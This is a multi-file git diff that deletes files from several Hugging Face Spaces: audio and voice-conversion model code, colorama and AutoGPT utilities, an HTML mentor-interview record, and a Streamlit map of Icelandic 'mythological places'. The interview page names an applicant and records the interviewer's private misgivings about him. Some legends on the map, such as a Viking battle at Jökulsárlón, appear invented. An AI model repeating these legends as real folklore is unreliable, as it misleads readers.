    - @return - A float with a range of -2.0 to +1.99999. -*/ -float PaUtil_GenerateFloatTriangularDither( PaUtilTriangularDitherGenerator *ditherState ); - - - -#ifdef __cplusplus -} -#endif /* __cplusplus */ -#endif /* PA_DITHER_H */ diff --git a/spaces/aodianyun/stable-diffusion-webui/modules/sd_hijack_xlmr.py b/spaces/aodianyun/stable-diffusion-webui/modules/sd_hijack_xlmr.py deleted file mode 100644 index 9e7e1803cbca8be1d8fd9e9e32f413016d02960d..0000000000000000000000000000000000000000 --- a/spaces/aodianyun/stable-diffusion-webui/modules/sd_hijack_xlmr.py +++ /dev/null @@ -1,34 +0,0 @@ -import open_clip.tokenizer -import torch - -from modules import sd_hijack_clip, devices -from modules.shared import opts - - -class FrozenXLMREmbedderWithCustomWords(sd_hijack_clip.FrozenCLIPEmbedderWithCustomWords): - def __init__(self, wrapped, hijack): - super().__init__(wrapped, hijack) - - self.id_start = wrapped.config.bos_token_id - self.id_end = wrapped.config.eos_token_id - self.id_pad = wrapped.config.pad_token_id - - self.comma_token = self.tokenizer.get_vocab().get(',', None) # alt diffusion doesn't have bits for comma - - def encode_with_transformers(self, tokens): - # there's no CLIP Skip here because all hidden layers have size of 1024 and the last one uses a - # trained layer to transform those 1024 into 768 for unet; so you can't choose which transformer - # layer to work with - you have to use the last - - attention_mask = (tokens != self.id_pad).to(device=tokens.device, dtype=torch.int64) - features = self.wrapped(input_ids=tokens, attention_mask=attention_mask) - z = features['projection_state'] - - return z - - def encode_embedding_init_text(self, init_text, nvpt): - embedding_layer = self.wrapped.roberta.embeddings - ids = self.wrapped.tokenizer(init_text, max_length=nvpt, return_tensors="pt", add_special_tokens=False)["input_ids"] - embedded = embedding_layer.token_embedding.wrapped(ids.to(devices.device)).squeeze(0) - - return embedded diff --git a/spaces/artificialguybr/video-dubbing/TTS/TTS/vc/modules/freevc/modules.py b/spaces/artificialguybr/video-dubbing/TTS/TTS/vc/modules/freevc/modules.py deleted file mode 100644 index 0503a13c8a18bae791aabb41b0e716ab3505222b..0000000000000000000000000000000000000000 --- a/spaces/artificialguybr/video-dubbing/TTS/TTS/vc/modules/freevc/modules.py +++ /dev/null @@ -1,391 +0,0 @@ -import copy -import math - -import numpy as np -import scipy -import torch -from torch import nn -from torch.nn import AvgPool1d, Conv1d, Conv2d, ConvTranspose1d -from torch.nn import functional as F -from torch.nn.utils import remove_weight_norm, weight_norm - -import TTS.vc.modules.freevc.commons as commons -from TTS.vc.modules.freevc.commons import get_padding, init_weights - -LRELU_SLOPE = 0.1 - - -class LayerNorm(nn.Module): - def __init__(self, channels, eps=1e-5): - super().__init__() - self.channels = channels - self.eps = eps - - self.gamma = nn.Parameter(torch.ones(channels)) - self.beta = nn.Parameter(torch.zeros(channels)) - - def forward(self, x): - x = x.transpose(1, -1) - x = F.layer_norm(x, (self.channels,), self.gamma, self.beta, self.eps) - return x.transpose(1, -1) - - -class ConvReluNorm(nn.Module): - def __init__(self, in_channels, hidden_channels, out_channels, kernel_size, n_layers, p_dropout): - super().__init__() - self.in_channels = in_channels - self.hidden_channels = hidden_channels - self.out_channels = out_channels - self.kernel_size = kernel_size - self.n_layers = n_layers - self.p_dropout = p_dropout - assert n_layers > 1, "Number of layers should be larger than 0." - - self.conv_layers = nn.ModuleList() - self.norm_layers = nn.ModuleList() - self.conv_layers.append(nn.Conv1d(in_channels, hidden_channels, kernel_size, padding=kernel_size // 2)) - self.norm_layers.append(LayerNorm(hidden_channels)) - self.relu_drop = nn.Sequential(nn.ReLU(), nn.Dropout(p_dropout)) - for _ in range(n_layers - 1): - self.conv_layers.append(nn.Conv1d(hidden_channels, hidden_channels, kernel_size, padding=kernel_size // 2)) - self.norm_layers.append(LayerNorm(hidden_channels)) - self.proj = nn.Conv1d(hidden_channels, out_channels, 1) - self.proj.weight.data.zero_() - self.proj.bias.data.zero_() - - def forward(self, x, x_mask): - x_org = x - for i in range(self.n_layers): - x = self.conv_layers[i](x * x_mask) - x = self.norm_layers[i](x) - x = self.relu_drop(x) - x = x_org + self.proj(x) - return x * x_mask - - -class DDSConv(nn.Module): - """ - Dialted and Depth-Separable Convolution - """ - - def __init__(self, channels, kernel_size, n_layers, p_dropout=0.0): - super().__init__() - self.channels = channels - self.kernel_size = kernel_size - self.n_layers = n_layers - self.p_dropout = p_dropout - - self.drop = nn.Dropout(p_dropout) - self.convs_sep = nn.ModuleList() - self.convs_1x1 = nn.ModuleList() - self.norms_1 = nn.ModuleList() - self.norms_2 = nn.ModuleList() - for i in range(n_layers): - dilation = kernel_size**i - padding = (kernel_size * dilation - dilation) // 2 - self.convs_sep.append( - nn.Conv1d(channels, channels, kernel_size, groups=channels, dilation=dilation, padding=padding) - ) - self.convs_1x1.append(nn.Conv1d(channels, channels, 1)) - self.norms_1.append(LayerNorm(channels)) - self.norms_2.append(LayerNorm(channels)) - - def forward(self, x, x_mask, g=None): - if g is not None: - x = x + g - for i in range(self.n_layers): - y = self.convs_sep[i](x * x_mask) - y = self.norms_1[i](y) - y = F.gelu(y) - y = self.convs_1x1[i](y) - y = self.norms_2[i](y) - y = F.gelu(y) - y = self.drop(y) - x = x + y - return x * x_mask - - -class WN(torch.nn.Module): - def __init__(self, hidden_channels, kernel_size, dilation_rate, n_layers, gin_channels=0, p_dropout=0): - super(WN, self).__init__() - assert kernel_size % 2 == 1 - self.hidden_channels = hidden_channels - self.kernel_size = (kernel_size,) - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - self.p_dropout = p_dropout - - self.in_layers = torch.nn.ModuleList() - self.res_skip_layers = torch.nn.ModuleList() - self.drop = nn.Dropout(p_dropout) - - if gin_channels != 0: - cond_layer = torch.nn.Conv1d(gin_channels, 2 * hidden_channels * n_layers, 1) - self.cond_layer = torch.nn.utils.weight_norm(cond_layer, name="weight") - - for i in range(n_layers): - dilation = dilation_rate**i - padding = int((kernel_size * dilation - dilation) / 2) - in_layer = torch.nn.Conv1d( - hidden_channels, 2 * hidden_channels, kernel_size, dilation=dilation, padding=padding - ) - in_layer = torch.nn.utils.weight_norm(in_layer, name="weight") - self.in_layers.append(in_layer) - - # last one is not necessary - if i < n_layers - 1: - res_skip_channels = 2 * hidden_channels - else: - res_skip_channels = hidden_channels - - res_skip_layer = torch.nn.Conv1d(hidden_channels, res_skip_channels, 1) - res_skip_layer = torch.nn.utils.weight_norm(res_skip_layer, name="weight") - self.res_skip_layers.append(res_skip_layer) - - def forward(self, x, x_mask, g=None, **kwargs): - output = torch.zeros_like(x) - n_channels_tensor = torch.IntTensor([self.hidden_channels]) - - if g is not None: - g = self.cond_layer(g) - - for i in range(self.n_layers): - x_in = self.in_layers[i](x) - if g is not None: - cond_offset = i * 2 * self.hidden_channels - g_l = g[:, cond_offset : cond_offset + 2 * self.hidden_channels, :] - else: - g_l = torch.zeros_like(x_in) - - acts = commons.fused_add_tanh_sigmoid_multiply(x_in, g_l, n_channels_tensor) - acts = self.drop(acts) - - res_skip_acts = self.res_skip_layers[i](acts) - if i < self.n_layers - 1: - res_acts = res_skip_acts[:, : self.hidden_channels, :] - x = (x + res_acts) * x_mask - output = output + res_skip_acts[:, self.hidden_channels :, :] - else: - output = output + res_skip_acts - return output * x_mask - - def remove_weight_norm(self): - if self.gin_channels != 0: - torch.nn.utils.remove_weight_norm(self.cond_layer) - for l in self.in_layers: - torch.nn.utils.remove_weight_norm(l) - for l in self.res_skip_layers: - torch.nn.utils.remove_weight_norm(l) - - -class ResBlock1(torch.nn.Module): - def __init__(self, channels, kernel_size=3, dilation=(1, 3, 5)): - super(ResBlock1, self).__init__() - self.convs1 = nn.ModuleList( - [ - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[0], - padding=get_padding(kernel_size, dilation[0]), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[1], - padding=get_padding(kernel_size, dilation[1]), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[2], - padding=get_padding(kernel_size, dilation[2]), - ) - ), - ] - ) - self.convs1.apply(init_weights) - - self.convs2 = nn.ModuleList( - [ - weight_norm( - Conv1d(channels, channels, kernel_size, 1, dilation=1, padding=get_padding(kernel_size, 1)) - ), - weight_norm( - Conv1d(channels, channels, kernel_size, 1, dilation=1, padding=get_padding(kernel_size, 1)) - ), - weight_norm( - Conv1d(channels, channels, kernel_size, 1, dilation=1, padding=get_padding(kernel_size, 1)) - ), - ] - ) - self.convs2.apply(init_weights) - - def forward(self, x, x_mask=None): - for c1, c2 in zip(self.convs1, self.convs2): - xt = F.leaky_relu(x, LRELU_SLOPE) - if x_mask is not None: - xt = xt * x_mask - xt = c1(xt) - xt = F.leaky_relu(xt, LRELU_SLOPE) - if x_mask is not None: - xt = xt * x_mask - xt = c2(xt) - x = xt + x - if x_mask is not None: - x = x * x_mask - return x - - def remove_weight_norm(self): - for l in self.convs1: - remove_weight_norm(l) - for l in self.convs2: - remove_weight_norm(l) - - -class ResBlock2(torch.nn.Module): - def __init__(self, channels, kernel_size=3, dilation=(1, 3)): - super(ResBlock2, self).__init__() - self.convs = nn.ModuleList( - [ - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[0], - padding=get_padding(kernel_size, dilation[0]), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[1], - padding=get_padding(kernel_size, dilation[1]), - ) - ), - ] - ) - self.convs.apply(init_weights) - - def forward(self, x, x_mask=None): - for c in self.convs: - xt = F.leaky_relu(x, LRELU_SLOPE) - if x_mask is not None: - xt = xt * x_mask - xt = c(xt) - x = xt + x - if x_mask is not None: - x = x * x_mask - return x - - def remove_weight_norm(self): - for l in self.convs: - remove_weight_norm(l) - - -class Log(nn.Module): - def forward(self, x, x_mask, reverse=False, **kwargs): - if not reverse: - y = torch.log(torch.clamp_min(x, 1e-5)) * x_mask - logdet = torch.sum(-y, [1, 2]) - return y, logdet - else: - x = torch.exp(x) * x_mask - return x - - -class Flip(nn.Module): - def forward(self, x, *args, reverse=False, **kwargs): - x = torch.flip(x, [1]) - if not reverse: - logdet = torch.zeros(x.size(0)).to(dtype=x.dtype, device=x.device) - return x, logdet - else: - return x - - -class ElementwiseAffine(nn.Module): - def __init__(self, channels): - super().__init__() - self.channels = channels - self.m = nn.Parameter(torch.zeros(channels, 1)) - self.logs = nn.Parameter(torch.zeros(channels, 1)) - - def forward(self, x, x_mask, reverse=False, **kwargs): - if not reverse: - y = self.m + torch.exp(self.logs) * x - y = y * x_mask - logdet = torch.sum(self.logs * x_mask, [1, 2]) - return y, logdet - else: - x = (x - self.m) * torch.exp(-self.logs) * x_mask - return x - - -class ResidualCouplingLayer(nn.Module): - def __init__( - self, - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - p_dropout=0, - gin_channels=0, - mean_only=False, - ): - assert channels % 2 == 0, "channels should be divisible by 2" - super().__init__() - self.channels = channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.half_channels = channels // 2 - self.mean_only = mean_only - - self.pre = nn.Conv1d(self.half_channels, hidden_channels, 1) - self.enc = WN( - hidden_channels, kernel_size, dilation_rate, n_layers, p_dropout=p_dropout, gin_channels=gin_channels - ) - self.post = nn.Conv1d(hidden_channels, self.half_channels * (2 - mean_only), 1) - self.post.weight.data.zero_() - self.post.bias.data.zero_() - - def forward(self, x, x_mask, g=None, reverse=False): - x0, x1 = torch.split(x, [self.half_channels] * 2, 1) - h = self.pre(x0) * x_mask - h = self.enc(h, x_mask, g=g) - stats = self.post(h) * x_mask - if not self.mean_only: - m, logs = torch.split(stats, [self.half_channels] * 2, 1) - else: - m = stats - logs = torch.zeros_like(m) - - if not reverse: - x1 = m + x1 * torch.exp(logs) * x_mask - x = torch.cat([x0, x1], 1) - logdet = torch.sum(logs, [1, 2]) - return x, logdet - else: - x1 = (x1 - m) * torch.exp(-logs) * x_mask - x = torch.cat([x0, x1], 1) - return x diff --git a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/altair/vega/tests/test_import.py b/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/altair/vega/tests/test_import.py deleted file mode 100644 index c569b86b758989b550fa3993653fe653b9709630..0000000000000000000000000000000000000000 --- a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/altair/vega/tests/test_import.py +++ /dev/null @@ -1,5 +0,0 @@ -from altair.vega import SCHEMA_VERSION, SCHEMA_URL - - -def test_schema_version(): - assert SCHEMA_VERSION in SCHEMA_URL diff --git a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/colorama/winterm.py b/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/colorama/winterm.py deleted file mode 100644 index aad867e8c80b826bf6a060116f17fa08a8eb0765..0000000000000000000000000000000000000000 --- a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/colorama/winterm.py +++ /dev/null @@ -1,195 +0,0 @@ -# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. -try: - from msvcrt import get_osfhandle -except ImportError: - def get_osfhandle(_): - raise OSError("This isn't windows!") - - -from . import win32 - -# from wincon.h -class WinColor(object): - BLACK = 0 - BLUE = 1 - GREEN = 2 - CYAN = 3 - RED = 4 - MAGENTA = 5 - YELLOW = 6 - GREY = 7 - -# from wincon.h -class WinStyle(object): - NORMAL = 0x00 # dim text, dim background - BRIGHT = 0x08 # bright text, dim background - BRIGHT_BACKGROUND = 0x80 # dim text, bright background - -class WinTerm(object): - - def __init__(self): - self._default = win32.GetConsoleScreenBufferInfo(win32.STDOUT).wAttributes - self.set_attrs(self._default) - self._default_fore = self._fore - self._default_back = self._back - self._default_style = self._style - # In order to emulate LIGHT_EX in windows, we borrow the BRIGHT style. - # So that LIGHT_EX colors and BRIGHT style do not clobber each other, - # we track them separately, since LIGHT_EX is overwritten by Fore/Back - # and BRIGHT is overwritten by Style codes. - self._light = 0 - - def get_attrs(self): - return self._fore + self._back * 16 + (self._style | self._light) - - def set_attrs(self, value): - self._fore = value & 7 - self._back = (value >> 4) & 7 - self._style = value & (WinStyle.BRIGHT | WinStyle.BRIGHT_BACKGROUND) - - def reset_all(self, on_stderr=None): - self.set_attrs(self._default) - self.set_console(attrs=self._default) - self._light = 0 - - def fore(self, fore=None, light=False, on_stderr=False): - if fore is None: - fore = self._default_fore - self._fore = fore - # Emulate LIGHT_EX with BRIGHT Style - if light: - self._light |= WinStyle.BRIGHT - else: - self._light &= ~WinStyle.BRIGHT - self.set_console(on_stderr=on_stderr) - - def back(self, back=None, light=False, on_stderr=False): - if back is None: - back = self._default_back - self._back = back - # Emulate LIGHT_EX with BRIGHT_BACKGROUND Style - if light: - self._light |= WinStyle.BRIGHT_BACKGROUND - else: - self._light &= ~WinStyle.BRIGHT_BACKGROUND - self.set_console(on_stderr=on_stderr) - - def style(self, style=None, on_stderr=False): - if style is None: - style = self._default_style - self._style = style - self.set_console(on_stderr=on_stderr) - - def set_console(self, attrs=None, on_stderr=False): - if attrs is None: - attrs = self.get_attrs() - handle = win32.STDOUT - if on_stderr: - handle = win32.STDERR - win32.SetConsoleTextAttribute(handle, attrs) - - def get_position(self, handle): - position = win32.GetConsoleScreenBufferInfo(handle).dwCursorPosition - # Because Windows coordinates are 0-based, - # and win32.SetConsoleCursorPosition expects 1-based. - position.X += 1 - position.Y += 1 - return position - - def set_cursor_position(self, position=None, on_stderr=False): - if position is None: - # I'm not currently tracking the position, so there is no default. - # position = self.get_position() - return - handle = win32.STDOUT - if on_stderr: - handle = win32.STDERR - win32.SetConsoleCursorPosition(handle, position) - - def cursor_adjust(self, x, y, on_stderr=False): - handle = win32.STDOUT - if on_stderr: - handle = win32.STDERR - position = self.get_position(handle) - adjusted_position = (position.Y + y, position.X + x) - win32.SetConsoleCursorPosition(handle, adjusted_position, adjust=False) - - def erase_screen(self, mode=0, on_stderr=False): - # 0 should clear from the cursor to the end of the screen. - # 1 should clear from the cursor to the beginning of the screen. - # 2 should clear the entire screen, and move cursor to (1,1) - handle = win32.STDOUT - if on_stderr: - handle = win32.STDERR - csbi = win32.GetConsoleScreenBufferInfo(handle) - # get the number of character cells in the current buffer - cells_in_screen = csbi.dwSize.X * csbi.dwSize.Y - # get number of character cells before current cursor position - cells_before_cursor = csbi.dwSize.X * csbi.dwCursorPosition.Y + csbi.dwCursorPosition.X - if mode == 0: - from_coord = csbi.dwCursorPosition - cells_to_erase = cells_in_screen - cells_before_cursor - elif mode == 1: - from_coord = win32.COORD(0, 0) - cells_to_erase = cells_before_cursor - elif mode == 2: - from_coord = win32.COORD(0, 0) - cells_to_erase = cells_in_screen - else: - # invalid mode - return - # fill the entire screen with blanks - win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord) - # now set the buffer's attributes accordingly - win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord) - if mode == 2: - # put the cursor where needed - win32.SetConsoleCursorPosition(handle, (1, 1)) - - def erase_line(self, mode=0, on_stderr=False): - # 0 should clear from the cursor to the end of the line. - # 1 should clear from the cursor to the beginning of the line. - # 2 should clear the entire line. - handle = win32.STDOUT - if on_stderr: - handle = win32.STDERR - csbi = win32.GetConsoleScreenBufferInfo(handle) - if mode == 0: - from_coord = csbi.dwCursorPosition - cells_to_erase = csbi.dwSize.X - csbi.dwCursorPosition.X - elif mode == 1: - from_coord = win32.COORD(0, csbi.dwCursorPosition.Y) - cells_to_erase = csbi.dwCursorPosition.X - elif mode == 2: - from_coord = win32.COORD(0, csbi.dwCursorPosition.Y) - cells_to_erase = csbi.dwSize.X - else: - # invalid mode - return - # fill the entire screen with blanks - win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord) - # now set the buffer's attributes accordingly - win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord) - - def set_title(self, title): - win32.SetConsoleTitle(title) - - -def enable_vt_processing(fd): - if win32.windll is None or not win32.winapi_test(): - return False - - try: - handle = get_osfhandle(fd) - mode = win32.GetConsoleMode(handle) - win32.SetConsoleMode( - handle, - mode | win32.ENABLE_VIRTUAL_TERMINAL_PROCESSING, - ) - - mode = win32.GetConsoleMode(handle) - if mode & win32.ENABLE_VIRTUAL_TERMINAL_PROCESSING: - return True - # Can get TypeError in testsuite where 'fd' is a Mock() - except (OSError, TypeError): - return False diff --git a/spaces/aryadytm/remove-photo-background/README.md b/spaces/aryadytm/remove-photo-background/README.md deleted file mode 100644 index b193cc66a68130609c2a555e6c3ebdb710abd3d3..0000000000000000000000000000000000000000 --- a/spaces/aryadytm/remove-photo-background/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Remove Photo Background -emoji: 😻 -colorFrom: green -colorTo: indigo -sdk: streamlit -sdk_version: 1.2.0 -python_version: 3.9.5 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces#reference diff --git a/spaces/at2507/SM_NLP_RecoSys/Data/Mentor_interviews/Saurav Roy.html b/spaces/at2507/SM_NLP_RecoSys/Data/Mentor_interviews/Saurav Roy.html deleted file mode 100644 index 111393c0c3b1c4cba0b254c0985723da03c5cbf6..0000000000000000000000000000000000000000 --- a/spaces/at2507/SM_NLP_RecoSys/Data/Mentor_interviews/Saurav Roy.html +++ /dev/null @@ -1,136 +0,0 @@ - - - - Saurav Roy - - - - -
    -

    Saurav Roy

    - -
    -

    Application

    There are very few dedicated data engineering programs as compared to computer science and data scientist programs.
    I have a computer science background and have moved to data engineering as well as transitioned from Individual contributor to manager.

    So, I want to give back to the engineering community by empowering people with practical job search tips & tricks and transition advice to the data engineering field.


    Interview


    How did you hear about SM?
    • A friend of mine suggested it for me

    Mentorship experience?
    • TA from 2016 to 2019 (during undergrad)
      • intro CS etc
    • At work, collaborated a lot. And now I have one co-op student and have some full-time folks coming under me
    • lots of interview experience
    • At scotia bank - using data within scotia bank

    What are beginners lacking?
    • Lots of DS courses, but in reality, companies need DEs
    • You're basically good if you have CS background (SQL)
      • Measuring data quality? Whose job is that?
      • Roles change from company to company, pay close attention to the role and the interview
      • SQL skills! Distributed computing (Airflow)
      • Spark / Pandas
    • If you don't have that CS background, it's a bigger challenge
    • Start with coding
    And how can you help?
    • Do one demonstratable project
      • Have like 4/5 files in data bricks 
      • Scheduling experience (airflow)
      • Hands-on experience also give confidence, you can re-use this in the future
    • Share my experience of getting a job
    • Interview prep (common SQL tricks, leet code)
    • encourage SE to start with DE, DS can come later
    • general career mindset - long-term planning (also you need money to survive)
    -
    -


    Questions about SM?
    • How many DE mentees?
    • How long does the mentorship last?
    • What if my mentees get hired before the mentorship?
    • What about equity? Can I change my agreement to add equity?
    • Can I charge 8%?
    • How do you verify income?
    -
    -


    I told him he was accepted, but he asked a lot about payment details and how to make the most money.. which made me uneasy
    -
    - -
    - - - \ No newline at end of file diff --git a/spaces/avivdm1/AutoGPT/autogpt/llm_utils.py b/spaces/avivdm1/AutoGPT/autogpt/llm_utils.py deleted file mode 100644 index 821820ffab07be2753cf385ff1de77820e4206ee..0000000000000000000000000000000000000000 --- a/spaces/avivdm1/AutoGPT/autogpt/llm_utils.py +++ /dev/null @@ -1,172 +0,0 @@ -from __future__ import annotations - -import time -from ast import List - -import openai -from colorama import Fore, Style -from openai.error import APIError, RateLimitError - -from autogpt.config import Config -from autogpt.logs import logger - -CFG = Config() - -openai.api_key = CFG.openai_api_key - - -def call_ai_function( - function: str, args: list, description: str, model: str | None = None -) -> str: - """Call an AI function - - This is a magic function that can do anything with no-code. See - https://github.com/Torantulino/AI-Functions for more info. - - Args: - function (str): The function to call - args (list): The arguments to pass to the function - description (str): The description of the function - model (str, optional): The model to use. Defaults to None. - - Returns: - str: The response from the function - """ - if model is None: - model = CFG.smart_llm_model - # For each arg, if any are None, convert to "None": - args = [str(arg) if arg is not None else "None" for arg in args] - # parse args to comma separated string - args = ", ".join(args) - messages = [ - { - "role": "system", - "content": f"You are now the following python function: ```# {description}" - f"\n{function}```\n\nOnly respond with your `return` value.", - }, - {"role": "user", "content": args}, - ] - - return create_chat_completion(model=model, messages=messages, temperature=0) - - -# Overly simple abstraction until we create something better -# simple retry mechanism when getting a rate error or a bad gateway -def create_chat_completion( - messages: list, # type: ignore - model: str | None = None, - temperature: float = CFG.temperature, - max_tokens: int | None = None, -) -> str: - """Create a chat completion using the OpenAI API - - Args: - messages (list[dict[str, str]]): The messages to send to the chat completion - model (str, optional): The model to use. Defaults to None. - temperature (float, optional): The temperature to use. Defaults to 0.9. - max_tokens (int, optional): The max tokens to use. Defaults to None. - - Returns: - str: The response from the chat completion - """ - response = None - num_retries = 10 - warned_user = False - if CFG.debug_mode: - print( - Fore.GREEN - + f"Creating chat completion with model {model}, temperature {temperature}," - f" max_tokens {max_tokens}" + Fore.RESET - ) - for attempt in range(num_retries): - backoff = 2 ** (attempt + 2) - try: - if CFG.use_azure: - response = openai.ChatCompletion.create( - deployment_id=CFG.get_azure_deployment_id_for_model(model), - model=model, - messages=messages, - temperature=temperature, - max_tokens=max_tokens, - ) - else: - response = openai.ChatCompletion.create( - model=model, - messages=messages, - temperature=temperature, - max_tokens=max_tokens, - ) - break - except RateLimitError: - if CFG.debug_mode: - print( - Fore.RED + "Error: ", - f"Reached rate limit, passing..." + Fore.RESET, - ) - if not warned_user: - logger.double_check( - f"Please double check that you have setup a {Fore.CYAN + Style.BRIGHT}PAID{Style.RESET_ALL} OpenAI API Account. " - + f"You can read more here: {Fore.CYAN}https://github.com/Significant-Gravitas/Auto-GPT#openai-api-keys-configuration{Fore.RESET}" - ) - warned_user = True - except APIError as e: - if e.http_status == 502: - pass - else: - raise - if attempt == num_retries - 1: - raise - if CFG.debug_mode: - print( - Fore.RED + "Error: ", - f"API Bad gateway. Waiting {backoff} seconds..." + Fore.RESET, - ) - time.sleep(backoff) - if response is None: - logger.typewriter_log( - "FAILED TO GET RESPONSE FROM OPENAI", - Fore.RED, - "Auto-GPT has failed to get a response from OpenAI's services. " - + f"Try running Auto-GPT again, and if the problem the persists try running it with `{Fore.CYAN}--debug{Fore.RESET}`.", - ) - logger.double_check() - if CFG.debug_mode: - raise RuntimeError(f"Failed to get response after {num_retries} retries") - else: - quit(1) - - return response.choices[0].message["content"] - - -def create_embedding_with_ada(text) -> list: - """Create an embedding with text-ada-002 using the OpenAI SDK""" - num_retries = 10 - for attempt in range(num_retries): - backoff = 2 ** (attempt + 2) - try: - if CFG.use_azure: - return openai.Embedding.create( - input=[text], - engine=CFG.get_azure_deployment_id_for_model( - "text-embedding-ada-002" - ), - )["data"][0]["embedding"] - else: - return openai.Embedding.create( - input=[text], model="text-embedding-ada-002" - )["data"][0]["embedding"] - except RateLimitError: - pass - except APIError as e: - if e.http_status == 502: - pass - else: - raise - if attempt == num_retries - 1: - raise - if CFG.debug_mode: - print( - Fore.RED + "Error: ", - f"API Bad gateway. Waiting {backoff} seconds..." + Fore.RESET, - ) - time.sleep(backoff) diff --git a/spaces/avivdm1/AutoGPT/autogpt/memory/no_memory.py b/spaces/avivdm1/AutoGPT/autogpt/memory/no_memory.py deleted file mode 100644 index 0371e96ae89f5eb88dae019a66351a229596ed7a..0000000000000000000000000000000000000000 --- a/spaces/avivdm1/AutoGPT/autogpt/memory/no_memory.py +++ /dev/null @@ -1,73 +0,0 @@ -"""A class that does not store any data. This is the default memory provider.""" -from __future__ import annotations - -from typing import Any - -from autogpt.memory.base import MemoryProviderSingleton - - -class NoMemory(MemoryProviderSingleton): - """ - A class that does not store any data. This is the default memory provider. - """ - - def __init__(self, cfg): - """ - Initializes the NoMemory provider. - - Args: - cfg: The config object. - - Returns: None - """ - pass - - def add(self, data: str) -> str: - """ - Adds a data point to the memory. No action is taken in NoMemory. - - Args: - data: The data to add. - - Returns: An empty string. - """ - return "" - - def get(self, data: str) -> list[Any] | None: - """ - Gets the data from the memory that is most relevant to the given data. - NoMemory always returns None. - - Args: - data: The data to compare to. - - Returns: None - """ - return None - - def clear(self) -> str: - """ - Clears the memory. No action is taken in NoMemory. - - Returns: An empty string. - """ - return "" - - def get_relevant(self, data: str, num_relevant: int = 5) -> list[Any] | None: - """ - Returns all the data in the memory that is relevant to the given data. - NoMemory always returns None. - - Args: - data: The data to compare to. - num_relevant: The number of relevant data to return. - - Returns: None - """ - return None - - def get_stats(self): - """ - Returns: An empty dictionary as there are no stats in NoMemory. - """ - return {} diff --git a/spaces/awacke1/Maps.Markers.Honor.Iceland/app.py b/spaces/awacke1/Maps.Markers.Honor.Iceland/app.py deleted file mode 100644 index bd080a54b598011a87a39b27b8e9f48e13f7adfc..0000000000000000000000000000000000000000 --- a/spaces/awacke1/Maps.Markers.Honor.Iceland/app.py +++ /dev/null @@ -1,104 +0,0 @@ -import streamlit as st -import folium -from streamlit_folium import folium_static -from folium.plugins import MarkerCluster - -# Define mythological places data for Iceland -mythological_places = [ - ('Ásbyrgi', 66.0082, -16.5096, 'Ásbyrgi is a horseshoe-shaped canyon, believed to have been formed by the hoof of Odin\'s eight-legged horse, Sleipnir.'), - ('Dimmuborgir', 65.6083, -16.8996, 'Dimmuborgir, or "Dark Cities," is a lava field with dramatic rock formations. It is said to be the dwelling of trolls and elves.'), - ('Hekla', 63.9920, -19.6656, 'Hekla is a stratovolcano believed to be the gateway to hell in the Middle Ages. It was also rumored to be a meeting place for witches.'), - ('Elliðaey', 63.4845, -20.2785, 'Elliðaey is an isolated island, where, according to legend, a mythical monster called the skoffin, a hybrid of a cat and a fox, is said to have lived.'), - ('Mývatn', 65.6039, -16.9965, 'Mývatn is a volcanic lake surrounded by unique geological formations. The area is steeped in folklore and is said to be home to various supernatural beings.'), - ('Djúpalónssandur', 64.7439, -23.9033, 'Djúpalónssandur is a black sand beach, where, according to legend, a supernatural seal woman appeared and was captured by a fisherman.'), - ('Reykjadalur', 64.0333, -21.2167, 'Reykjadalur, or "Steam Valley," is a geothermal area with hot springs. It is believed to be the home of hidden people, who live in the rocks and hills.'), - ('Snaefellsjokull', 64.8080, -23.7767, 'Snaefellsjokull is a glacier-capped volcano that inspired Jules Verne\'s "Journey to the Center of the Earth." It is believed to hold mystical powers.'), - ('Jokulsarlon', 64.0784, -16.2300, 'Jokulsarlon is a glacial lagoon that is said to be the site of an ancient Viking battle, where warriors fought for control of the area.'), - ('Vatnajokull', 64.4150, -16.8333, 'Vatnajokull is Europe\'s largest glacier, and according to legend, it was formed by the tears of a grieving giantess.') -] - -# Create a map centered on Iceland -m = folium.Map(location=[65.0, -18.0], zoom_start=7) - -# Add markers for each mythological place and add them to a MarkerCluster -marker_cluster = MarkerCluster().add_to(m) -for place in mythological_places: - folium.Marker( - location=[place[1], place[2]], - popup=f'{place[0]}
    {place[3]}', - icon=folium.Icon(color='red') - ).add_to(marker_cluster) - -# Add PolyLine for paths between markers with animation -locations = [place[1:3] for place in mythological_places] -path = folium.PolyLine(locations, color='blue', opacity=0.8, weight=5, smooth_factor=0.5).add_to(m) -folium.plugins.PolyLineTextPath(polyline=path, text='\u25BA', repeat=True, offset=6, attributes={'fill': 'blue', 'font-weight': 'bold', 'font-size': '12'}).add_to(path) - -folium_static(m) - -st.markdown(""" -# Icelandic Mythological Places - -The map above shows the location of various mythological places in Iceland. Hover over the markers to learn more about the stories behind each location. - -""") - - -# Add markers for each mythological place -for place in mythological_places: - folium.Marker( - location=[place[1], place[2]], - popup=f'{place[0]}
